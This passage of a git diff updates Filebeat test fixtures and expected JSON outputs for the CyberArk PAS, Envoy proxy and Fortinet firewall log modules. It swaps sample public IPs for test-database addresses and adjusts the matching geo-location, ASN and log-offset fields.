--- a/x-pack/filebeat/module/cyberarkpas/audit/test/98_open_file_write_only.log-expected.json
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/98_open_file_write_only.log-expected.json
@@ -51,7 +51,7 @@
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "PVWAConfig",
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 10 10:44:08",
         "event.action": "open file (write only)",
         "event.code": "98",
@@ -71,19 +71,16 @@
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -100,7 +97,7 @@
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "PVWAConfig",
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "35.192.121.42",
+        "cyberarkpas.audit.station": "67.43.156.12",
         "cyberarkpas.audit.timestamp": "Mar 10 14:17:40",
         "event.action": "open file (write only)",
         "event.code": "98",
@@ -113,25 +110,23 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 1261,
+        "log.offset": 1260,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "35.192.121.42"
+            "67.43.156.12"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "35.192.121.42",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 38.6583,
-        "source.geo.location.lon": -77.2481,
-        "source.geo.region_iso_code": "US-VA",
-        "source.geo.region_name": "Virginia",
-        "source.ip": "35.192.121.42",
+        "source.address": "67.43.156.12",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.12",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -165,7 +160,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 1889,
+        "log.offset": 1887,
         "log.syslog.priority": "5",
         "network.direction": "internal",
         "observer.hostname": "VAULT",
diff --git a/x-pack/filebeat/module/envoyproxy/log/test/envoy-json.log-expected.json b/x-pack/filebeat/module/envoyproxy/log/test/envoy-json.log-expected.json
index ab2070f0d925..9219be79328f 100644
--- a/x-pack/filebeat/module/envoyproxy/log/test/envoy-json.log-expected.json
+++ b/x-pack/filebeat/module/envoyproxy/log/test/envoy-json.log-expected.json
@@ -2,16 +2,6 @@
     {
         "@timestamp": "2019-04-10T03:49:34.451Z",
         "destination.address": "52.71.234.219",
-        "destination.as.number": 14618,
-        "destination.as.organization.name": "Amazon.com, Inc.",
-        "destination.geo.city_name": "Ashburn",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 39.0481,
-        "destination.geo.location.lon": -77.4728,
-        "destination.geo.region_iso_code": "US-VA",
-        "destination.geo.region_name": "Virginia",
         "destination.ip": "52.71.234.219",
         "destination.port": 80,
         "envoyproxy.authority": "httpbin.org",
@@ -113,4 +103,4 @@
             "envoyproxy"
         ]
     }
-]
+]
\ No newline at end of file
diff --git a/x-pack/filebeat/module/envoyproxy/log/test/envoy.log-expected.json b/x-pack/filebeat/module/envoyproxy/log/test/envoy.log-expected.json
index af686156d99a..18abf6ae0623 100644
--- a/x-pack/filebeat/module/envoyproxy/log/test/envoy.log-expected.json
+++ b/x-pack/filebeat/module/envoyproxy/log/test/envoy.log-expected.json
@@ -136,13 +136,6 @@
     {
         "@timestamp": "2019-04-11T00:51:07.980Z",
         "destination.address": "151.101.66.217",
-        "destination.as.number": 54113,
-        "destination.as.organization.name": "Fastly",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "151.101.66.217",
         "destination.port": 80,
         "envoyproxy.authority": "www.elastic.co",
diff --git a/x-pack/filebeat/module/fortinet/firewall/test/event.log b/x-pack/filebeat/module/fortinet/firewall/test/event.log
index 48b5d206117d..f3baa713171a 100644
--- a/x-pack/filebeat/module/fortinet/firewall/test/event.log
+++ b/x-pack/filebeat/module/fortinet/firewall/test/event.log
@@ -1,19 +1,19 @@
 <189>date=2020-04-23 time=12:32:48 devname="testswitch3" devid="someotherrouteridagain" logid="0102043014" type="event" subtype="user" level="notice" vd="root" eventtime=1587231168439640874 tz="-0500" logdesc="FSSO logon authentication status" srcip=10.10.10.10 user="elasticouser" server="elasticserver" action="FSSO-logon" msg="FSSO-logon event from FSSO_elasticserver: user elasticouser logged on 10.10.10.10"
-<187>date=2020-04-23 time=12:32:47 devname="testswitch3" devid="someotherrouteridagain" logid="0101037124" type="event" subtype="vpn" level="error" vd="root" eventtime=1587231168339114138 tz="-0500" logdesc="IPsec phase 1 error" msg="IPsec phase 1 error" action="negotiate" remip=8.8.4.4 locip=8.8.8.8 remport=500 locport=500 outintf="wan2" cookies="345hkjhdrs87/0000000000000000" user="N/A" group="N/A" xauthuser="N/A" xauthgroup="N/A" assignip=N/A vpntunnel="N/A" status="negotiate_error" reason="peer SA proposal not match local policy" peer_notif="NOT-APPLICABLE"
-<189>date=2020-04-23 time=12:32:31 devname="testswitch3" devid="someotherrouteridagain" logid="0101037127" type="event" subtype="vpn" level="notice" vd="root" eventtime=1587231151628960857 tz="-0500" logdesc="Progress IPsec phase 1" msg="progress IPsec phase 1" action="negotiate" remip=8.4.5.4 locip=9.9.9.9 remport=500 locport=500 outintf="wan1" cookies="df868dsg876d/0000000000000000" user="N/A" group="N/A" xauthuser="N/A" xauthgroup="N/A" assignip=N/A vpntunnel="elasticvpn" status="success" init="local" mode="main" dir="outbound" stage=1 role="initiator" result="OK"
+<187>date=2020-04-23 time=12:32:47 devname="testswitch3" devid="someotherrouteridagain" logid="0101037124" type="event" subtype="vpn" level="error" vd="root" eventtime=1587231168339114138 tz="-0500" logdesc="IPsec phase 1 error" msg="IPsec phase 1 error" action="negotiate" remip=8.8.4.4 locip=175.16.199.1 remport=500 locport=500 outintf="wan2" cookies="345hkjhdrs87/0000000000000000" user="N/A" group="N/A" xauthuser="N/A" xauthgroup="N/A" assignip=N/A vpntunnel="N/A" status="negotiate_error" reason="peer SA proposal not match local policy" peer_notif="NOT-APPLICABLE"
+<189>date=2020-04-23 time=12:32:31 devname="testswitch3" devid="someotherrouteridagain" logid="0101037127" type="event" subtype="vpn" level="notice" vd="root" eventtime=1587231151628960857 tz="-0500" logdesc="Progress IPsec phase 1" msg="progress IPsec phase 1" action="negotiate" remip=8.4.5.4 locip=1.128.3.4 remport=500 locport=500 outintf="wan1" cookies="df868dsg876d/0000000000000000" user="N/A" group="N/A" xauthuser="N/A" xauthgroup="N/A" assignip=N/A vpntunnel="elasticvpn" status="success" init="local" mode="main" dir="outbound" stage=1 role="initiator" result="OK"
 <189>date=2020-04-23 time=14:32:09 devname="testswitch3" devid="someotherrouteridagain" logid="0100040704" type="event" subtype="system" level="notice" vd="root" eventtime=1587231129938795255 tz="-0300" logdesc="System performance statistics" action="perf-stats" cpu=0 mem=10 totalsession=23 disk=0 bandwidth="23/4" setuprate=0 disklograte=0 fazlograte=0 freediskstorage=331 sysuptime=25170 msg="Performance statistics: average CPU: 0, memory:  23, concurrent sessions:  20, setup-rate: 0"
 <189>date=2020-04-23 time=12:32:09 devname="testswitch3" devid="someotherrouteridagain" logid="0102043039" type="event" subtype="user" level="notice" vd="root" eventtime=1587231130109462858 tz="-0500" logdesc="Authentication logon" srcip=10.10.10.10 user="elastiiiuser" authserver="FSSO_elastiauth" action="auth-logon" status="logon" msg="User elastiiiuser added to auth logon"
-<189>date=2020-04-23 time=12:32:00 devname="testswitch3" devid="someotherrouteridagain" logid="0101037127" type="event" subtype="vpn" level="notice" vd="root" eventtime=1587231120608961118 tz="-0500" logdesc="Progress IPsec phase 1" msg="progress IPsec phase 1" action="negotiate" remip=8.8.5.4 locip=7.6.3.4 remport=500 locport=500 outintf="wan1" cookies="345khj34566/0000000000000000" user="N/A" group="N/A" xauthuser="N/A" xauthgroup="N/A" assignip=N/A vpntunnel="testvpn" status="success" init="local" mode="main" dir="outbound" stage=1 role="initiator" result="OK"
+<189>date=2020-04-23 time=12:32:00 devname="testswitch3" devid="someotherrouteridagain" logid="0101037127" type="event" subtype="vpn" level="notice" vd="root" eventtime=1587231120608961118 tz="-0500" logdesc="Progress IPsec phase 1" msg="progress IPsec phase 1" action="negotiate" remip=8.8.5.4 locip=81.2.69.145 remport=500 locport=500 outintf="wan1" cookies="345khj34566/0000000000000000" user="N/A" group="N/A" xauthuser="N/A" xauthgroup="N/A" assignip=N/A vpntunnel="testvpn" status="success" init="local" mode="main" dir="outbound" stage=1 role="initiator" result="OK"
 <189>date=2020-04-23 time=14:24:13 devname="testswitch3" devid="someotherrouteridagain" logid="0100041006" type="event" subtype="system" level="notice" vd="root" eventtime=1587230655301863513 tz="-0300" logdesc="FortiSandbox AV database updated" version="1.522479" msg="FortiSandbox AV database updated"
 <190>date=2020-04-23 time=12:23:47 devname="testswitch3" devid="someotherrouteridagain" logid="0107045057" type="event" subtype="endpoint" level="information" vd="root" eventtime=1587230627558979735 tz="-0500" logdesc="FortiClient connection added" action="add" status="success" license_limit="unlimited" used_for_type=3 connection_type="sslvpn" count=2 user="elastico" ip=172.16.0.2 name="somerouter" fctuid="645234fdd01F885824F764" msg="Add a FortiClient Connection."
 <190>date=2020-04-23 time=12:23:47 devname="testswitch3" devid="someotherrouteridagain" logid="0101039943" type="event" subtype="vpn" level="information" vd="root" eventtime=1587230627334405765 tz="-0500" logdesc="SSL VPN new connection" action="ssl-new-con" tunneltype="ssl" tunnelid=2 remip=8.8.8.6 user="N/A" group="N/A" dst_host="N/A" reason="N/A" msg="SSL new connection"
 <190>date=2020-04-23 time=12:23:47 devname="testswitch3" devid="someotherrouteridagain" logid="0101039947" type="event" subtype="vpn" level="information" vd="root" eventtime=1587230627698970007 tz="-0500" logdesc="SSL VPN tunnel up" action="tunnel-up" tunneltype="ssl-tunnel" tunnelid=2345 remip=8.8.5.4 tunnelip=10.10.10.10 user="someuser" group="somegroup" dst_host="N/A" reason="tunnel established" msg="SSL tunnel established"
 <189>date=2020-04-23 time=14:16:42 devname="testswitch3" devid="someotherrouteridagain" logid="0102043015" type="event" subtype="user" level="notice" vd="root" eventtime=1587230204674924332 tz="-0300" logdesc="FSSO log off authentication status" srcip=192.168.1.1 user="elasticadmin" server="FSSO_somefssoserver" action="FSSO-logoff" msg="FSSO-logoff event from FSSO_somefssoserver: user elasticuser logged off 1192.168.1.1"
-<189>date=2020-04-23 time=12:16:02 devname="testswitch3" devid="someotherrouteridagain" logid="0100022915" type="event" subtype="system" level="notice" vd="root" eventtime=1587230163121116383 tz="-0500" logdesc="FortiCloud server connected" server="9.9.9.9" action="connect" msg="FortiCloud 9.9.9.9 server is connected"
+<189>date=2020-04-23 time=12:16:02 devname="testswitch3" devid="someotherrouteridagain" logid="0100022915" type="event" subtype="system" level="notice" vd="root" eventtime=1587230163121116383 tz="-0500" logdesc="FortiCloud server connected" server="1.128.3.4" action="connect" msg="FortiCloud 1.128.3.4 server is connected"
 <189>date=2020-04-23 time=12:16:02 devname="testswitch3" devid="someotherrouteridagain" logid="0100022913" type="event" subtype="system" level="notice" vd="root" eventtime=1587230163375149856 tz="-0500" logdesc="FortiCloud server disconnected" server="4.4.4.4" action="disconnect" reason="connection reset" msg="FortiCloud 4.4.4.4 server is disconnected"
-<190>date=2020-11-02 time=08:11:38 devname=testfirewall devid=newrouterid logid=0101037127 type="event" subtype=vpn level=notice vd=root logdesc="Progress IPsec phase 1" msg="progress IPsec phase 1" action=negotiate remip=8.8.8.8 locip=10.10.10.10 remport=500 locport=500 outintf="port1" cookies="125cbf9ee8349965/0000000000000000" user="N/A" group="N/A" xauthuser="N/A" xauthgroup="N/A" assignip=N/A vpntunnel="P1_Test" status=success init=local mode=aggressive dir=outbound stage=1 role=initiator result=OK
+<190>date=2020-11-02 time=08:11:38 devname=testfirewall devid=newrouterid logid=0101037127 type="event" subtype=vpn level=notice vd=root logdesc="Progress IPsec phase 1" msg="progress IPsec phase 1" action=negotiate remip=175.16.199.1 locip=10.10.10.10 remport=500 locport=500 outintf="port1" cookies="125cbf9ee8349965/0000000000000000" user="N/A" group="N/A" xauthuser="N/A" xauthgroup="N/A" assignip=N/A vpntunnel="P1_Test" status=success init=local mode=aggressive dir=outbound stage=1 role=initiator result=OK
 <190>date=2019-05-13 time=11:20:54 logid="0100032001" type="event" subtype="system" level="information" vd="vdom1" eventtime=1557771654587081441 logdesc="Admin login successful" sn="1557771654" user="admin" ui="ssh(172.16.200.254)" method="ssh" srcip=172.16.200.254 dstip=172.16.200.2 action="login" status="success" reason="none" profile="super_admin" msg="Administrator admin logged in successfully from ssh(172.16.200.254)"
-<190>date=2019-05-13 time=14:21:42 logid="0101037127" type="event" subtype="vpn" level="notice" vd="root" eventtime=1557782502722231889 logdesc="Progress IPsec phase 1" msg="progress IPsec phase 1" action="negotiate" remip=50.1.1.101 locip=50.1.1.100 remport=500 locport=500 outintf="port14" cookies="9091f4d4837ea71c/0000000000000000" user="N/A" group="N/A" xauthuser="N/A" xauthgroup="N/A" assignip=N/A vpntunnel="test" status="success" init="local" mode="main" dir="outbound" stage=1 role="initiator" result="OK"
+<190>date=2019-05-13 time=14:21:42 logid="0101037127" type="event" subtype="vpn" level="notice" vd="root" eventtime=1557782502722231889 logdesc="Progress IPsec phase 1" msg="progress IPsec phase 1" action="negotiate" remip=50.1.1.101 locip=1.128.3.4 remport=500 locport=500 outintf="port14" cookies="9091f4d4837ea71c/0000000000000000" user="N/A" group="N/A" xauthuser="N/A" xauthgroup="N/A" assignip=N/A vpntunnel="test" status="success" init="local" mode="main" dir="outbound" stage=1 role="initiator" result="OK"
 <190>date=2019-05-13 time=15:55:56 logid="0102043008" type="event" subtype="user" level="notice" vd="root" eventtime=1557788156913809277 logdesc="Authentication success" srcip=10.1.100.11 dstip=172.16.200.55 policyid=1 interface="port10" user="bob" group="local-group1" authproto="TELNET(10.1.100.11)" action="authentication" status="success" reason="N/A" msg="User bob succeeded in authentication"
 <189>date=2019-05-14 time=08:32:13 logid="0107045057" type="event" subtype="endpoint" level="information" vd="root" eventtime=1557847933900764210 logdesc="FortiClient connection added" action="add" status="success" license_limit="unlimited" used_for_type=4 connection_type="sslvpn" count=1 user="skubas" ip=172.18.64.250 name="VAN-200957-PC" fctuid="52C66FE08F724FE0B116DAD5062C96CD" msg="Add a FortiClient Connection."
 <189>date=2019-05-14 time=08:19:38 logid="0107045058" type="event" subtype="endpoint" level="information" vd="root" eventtime=1557847179037488154 logdesc="FortiClient connection closed" action="close" status="success" license_limit="unlimited" used_for_type=5 connection_type="sslvpn" count=1 user="skubas" ip=172.18.64.250 name="VAN-200957-PC" fctuid="52C66FE08F724FE0B116DAD5062C96CD" msg="Close a FortiClient Connection."
diff --git a/x-pack/filebeat/module/fortinet/firewall/test/event.log-expected.json b/x-pack/filebeat/module/fortinet/firewall/test/event.log-expected.json
index b44c6d83aa5c..524fdb93b6d3 100644
--- a/x-pack/filebeat/module/fortinet/firewall/test/event.log-expected.json
+++ b/x-pack/filebeat/module/fortinet/firewall/test/event.log-expected.json
@@ -49,13 +49,6 @@
     },
     {
         "@timestamp": "2020-04-23T12:32:47.000-05:00",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "8.8.4.4",
         "destination.port": 500,
         "event.action": "negotiate",
@@ -93,19 +86,20 @@
         "observer.type": "firewall",
         "observer.vendor": "Fortinet",
         "related.ip": [
-            "8.8.4.4",
-            "8.8.8.8"
+            "175.16.199.1",
+            "8.8.4.4"
         ],
         "rule.description": "IPsec phase 1 error",
         "service.type": "fortinet",
-        "source.as.number": 15169,
-        "source.as.organization.name": "Google LLC",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 37.751,
-        "source.geo.location.lon": -97.822,
-        "source.ip": "8.8.8.8",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "source.port": 500,
         "tags": [
             "fortinet-firewall",
@@ -114,13 +108,6 @@
     },
     {
         "@timestamp": "2020-04-23T12:32:31.000-05:00",
-        "destination.as.number": 3356,
-        "destination.as.organization.name": "Level 3 Parent, LLC",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "8.4.5.4",
         "destination.port": 500,
         "event.action": "negotiate",
@@ -153,7 +140,7 @@
         "fortinet.firewall.vpntunnel": "elasticvpn",
         "input.type": "log",
         "log.level": "notice",
-        "log.offset": 981,
+        "log.offset": 986,
         "message": "progress IPsec phase 1",
         "network.direction": "outbound",
         "network.type": "ipv4",
@@ -163,19 +150,14 @@
         "observer.type": "firewall",
         "observer.vendor": "Fortinet",
         "related.ip": [
-            "8.4.5.4",
-            "9.9.9.9"
+            "1.128.3.4",
+            "8.4.5.4"
         ],
         "rule.description": "Progress IPsec phase 1",
         "service.type": "fortinet",
-        "source.as.number": 19281,
-        "source.as.organization.name": "Quad9",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "FR",
-        "source.geo.country_name": "France",
-        "source.geo.location.lat": 48.8582,
-        "source.geo.location.lon": 2.3387,
-        "source.ip": "9.9.9.9",
+        "source.as.number": 1221,
+        "source.as.organization.name": "Telstra Pty Ltd",
+        "source.ip": "1.128.3.4",
         "source.port": 500,
         "tags": [
             "fortinet-firewall",
@@ -214,7 +196,7 @@
         "fortinet.firewall.vd": "root",
         "input.type": "log",
         "log.level": "notice",
-        "log.offset": 1555,
+        "log.offset": 1562,
         "message": "Performance statistics: average CPU: 0, memory:  23, concurrent sessions:  20, setup-rate: 0",
         "observer.name": "testswitch3",
         "observer.product": "Fortigate",
@@ -254,7 +236,7 @@
         "fortinet.firewall.vd": "root",
         "input.type": "log",
         "log.level": "notice",
-        "log.offset": 2045,
+        "log.offset": 2052,
         "message": "User elastiiiuser added to auth logon",
         "network.type": "ipv4",
         "observer.name": "testswitch3",
@@ -279,13 +261,6 @@
     },
     {
         "@timestamp": "2020-04-23T12:32:00.000-05:00",
-        "destination.as.number": 3356,
-        "destination.as.organization.name": "Level 3 Parent, LLC",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "8.8.5.4",
         "destination.port": 500,
         "event.action": "negotiate",
@@ -318,7 +293,7 @@
         "fortinet.firewall.vpntunnel": "testvpn",
         "input.type": "log",
         "log.level": "notice",
-        "log.offset": 2423,
+        "log.offset": 2430,
         "message": "progress IPsec phase 1",
         "network.direction": "outbound",
         "network.type": "ipv4",
@@ -328,17 +303,20 @@
         "observer.type": "firewall",
         "observer.vendor": "Fortinet",
         "related.ip": [
-            "7.6.3.4",
-            "8.8.5.4"
+            "8.8.5.4",
+            "81.2.69.145"
         ],
         "rule.description": "Progress IPsec phase 1",
         "service.type": "fortinet",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 37.751,
-        "source.geo.location.lon": -97.822,
-        "source.ip": "7.6.3.4",
+        "source.geo.city_name": "London",
+        "source.geo.continent_name": "Europe",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.145",
         "source.port": 500,
         "tags": [
             "fortinet-firewall",
@@ -360,7 +338,7 @@
         "fortinet.firewall.version": "1.522479",
         "input.type": "log",
         "log.level": "notice",
-        "log.offset": 2993,
+        "log.offset": 3004,
         "message": "FortiSandbox AV database updated",
         "observer.name": "testswitch3",
         "observer.product": "Fortigate",
@@ -398,7 +376,7 @@
         "fortinet.firewall.vd": "root",
         "input.type": "log",
         "log.level": "information",
-        "log.offset": 3297,
+        "log.offset": 3308,
         "message": "Add a FortiClient Connection.",
         "observer.name": "testswitch3",
         "observer.product": "Fortigate",
@@ -418,13 +396,6 @@
     },
     {
         "@timestamp": "2020-04-23T12:23:47.000-05:00",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "8.8.8.6",
         "event.action": "ssl-new-con",
         "event.category": [
@@ -448,7 +419,7 @@
         "fortinet.firewall.vd": "root",
         "input.type": "log",
         "log.level": "information",
-        "log.offset": 3767,
+        "log.offset": 3778,
         "message": "SSL new connection",
         "network.type": "ipv4",
         "observer.name": "testswitch3",
@@ -468,13 +439,6 @@
     },
     {
         "@timestamp": "2020-04-23T12:23:47.000-05:00",
-        "destination.as.number": 3356,
-        "destination.as.organization.name": "Level 3 Parent, LLC",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "8.8.5.4",
         "event.action": "tunnel-up",
         "event.category": [
@@ -500,7 +464,7 @@
         "fortinet.firewall.vd": "root",
         "input.type": "log",
         "log.level": "information",
-        "log.offset": 4144,
+        "log.offset": 4155,
         "message": "SSL tunnel established",
         "network.type": "ipv4",
         "observer.name": "testswitch3",
@@ -548,7 +512,7 @@
         "fortinet.firewall.vd": "root",
         "input.type": "log",
         "log.level": "notice",
-        "log.offset": 4575,
+        "log.offset": 4586,
         "message": "FSSO-logoff event from FSSO_somefssoserver: user elasticuser logged off 1192.168.1.1",
         "network.type": "ipv4",
         "observer.name": "testswitch3",
@@ -582,14 +546,14 @@
         "event.timezone": "-0500",
         "fileset.name": "firewall",
         "fortinet.firewall.action": "connect",
-        "fortinet.firewall.server": "9.9.9.9",
+        "fortinet.firewall.server": "1.128.3.4",
         "fortinet.firewall.subtype": "system",
         "fortinet.firewall.type": "event",
         "fortinet.firewall.vd": "root",
         "input.type": "log",
         "log.level": "notice",
-        "log.offset": 5000,
-        "message": "FortiCloud 9.9.9.9 server is connected",
+        "log.offset": 5011,
+        "message": "FortiCloud 1.128.3.4 server is connected",
         "observer.name": "testswitch3",
         "observer.product": "Fortigate",
         "observer.serial_number": "someotherrouteridagain",
@@ -620,7 +584,7 @@
         "fortinet.firewall.vd": "root",
         "input.type": "log",
         "log.level": "notice",
-        "log.offset": 5320,
+        "log.offset": 5335,
         "message": "FortiCloud 4.4.4.4 server is disconnected",
         "observer.name": "testswitch3",
         "observer.product": "Fortigate",
@@ -636,14 +600,15 @@
     },
     {
         "@timestamp": "2020-11-02T08:11:38.000-02:00",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
         "destination.port": 500,
         "event.action": "negotiate",
         "event.category": [
@@ -674,7 +639,7 @@
         "fortinet.firewall.vpntunnel": "P1_Test",
         "input.type": "log",
         "log.level": "notice",
-        "log.offset": 5675,
+        "log.offset": 5690,
         "message": "progress IPsec phase 1",
         "network.direction": "outbound",
         "network.type": "ipv4",
@@ -685,7 +650,7 @@
         "observer.vendor": "Fortinet",
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "rule.description": "Progress IPsec phase 1",
         "service.type": "fortinet",
@@ -719,7 +684,7 @@
         "fortinet.firewall.vd": "vdom1",
         "input.type": "log",
         "log.level": "information",
-        "log.offset": 6184,
+        "log.offset": 6204,
         "message": "Administrator admin logged in successfully from ssh(172.16.200.254)",
         "network.type": "ipv4",
         "observer.product": "Fortigate",
@@ -743,16 +708,6 @@
     },
     {
         "@timestamp": "2019-05-13T14:21:42.000-02:00",
-        "destination.as.number": 7065,
-        "destination.as.organization.name": "Sonoma Interconnect",
-        "destination.geo.city_name": "North Highlands",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 38.6741,
-        "destination.geo.location.lon": -121.3768,
-        "destination.geo.region_iso_code": "US-CA",
-        "destination.geo.region_name": "California",
         "destination.ip": "50.1.1.101",
         "destination.port": 500,
         "event.action": "negotiate",
@@ -785,7 +740,7 @@
         "fortinet.firewall.vpntunnel": "test",
         "input.type": "log",
         "log.level": "notice",
-        "log.offset": 6611,
+        "log.offset": 6631,
         "message": "progress IPsec phase 1",
         "network.direction": "outbound",
         "network.type": "ipv4",
@@ -793,22 +748,14 @@
         "observer.type": "firewall",
         "observer.vendor": "Fortinet",
         "related.ip": [
-            "50.1.1.100",
+            "1.128.3.4",
             "50.1.1.101"
         ],
         "rule.description": "Progress IPsec phase 1",
         "service.type": "fortinet",
-        "source.as.number": 7065,
-        "source.as.organization.name": "Sonoma Interconnect",
-        "source.geo.city_name": "North Highlands",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 38.6741,
-        "source.geo.location.lon": -121.3768,
-        "source.geo.region_iso_code": "US-CA",
-        "source.geo.region_name": "California",
-        "source.ip": "50.1.1.100",
+        "source.as.number": 1221,
+        "source.as.organization.name": "Telstra Pty Ltd",
+        "source.ip": "1.128.3.4",
         "source.port": 500,
         "tags": [
             "fortinet-firewall",
@@ -838,7 +785,7 @@
         "fortinet.firewall.vd": "root",
         "input.type": "log",
         "log.level": "notice",
-        "log.offset": 7127,
+        "log.offset": 7146,
         "message": "User bob succeeded in authentication",
         "network.type": "ipv4",
         "observer.product": "Fortigate",
@@ -886,7 +833,7 @@
         "fortinet.firewall.vd": "root",
         "input.type": "log",
         "log.level": "information",
-        "log.offset": 7526,
+        "log.offset": 7545,
         "message": "Add a FortiClient Connection.",
         "observer.product": "Fortigate",
         "observer.type": "firewall",
@@ -926,7 +873,7 @@
         "fortinet.firewall.vd": "root",
         "input.type": "log",
         "log.level": "information",
-        "log.offset": 7946,
+        "log.offset": 7965,
         "message": "Close a FortiClient Connection.",
         "observer.product": "Fortigate",
         "observer.type": "firewall",
@@ -958,7 +905,7 @@
         "fortinet.firewall.vd": "root",
         "input.type": "log",
         "log.level": "information",
-        "log.offset": 8371,
+        "log.offset": 8390,
         "message": "Updated tag FCTEMS0000011111_AV-Running.",
         "observer.name": "firewall",
         "observer.product": "Fortigate",
@@ -988,7 +935,7 @@
         "fortinet.firewall.vd": "root",
         "input.type": "log",
         "log.level": "information",
-        "log.offset": 8717,
+        "log.offset": 8736,
         "message": "Updated tag MAC_FCTEMS0000011111_AV-Running.",
         "observer.name": "firewall",
         "observer.product": "Fortigate",
@@ -1018,7 +965,7 @@
         "fortinet.firewall.vd": "root",
         "input.type": "log",
         "log.level": "information",
-        "log.offset": 9071,
+        "log.offset": 9090,
         "message": "Updated tag FCTEMS0000011111_Connected-to-EMS.",
         "observer.name": "firewall",
         "observer.product": "Fortigate",
@@ -1048,7 +995,7 @@
         "fortinet.firewall.vd": "root",
         "input.type": "log",
         "log.level": "information",
-        "log.offset": 9429,
+        "log.offset": 9448,
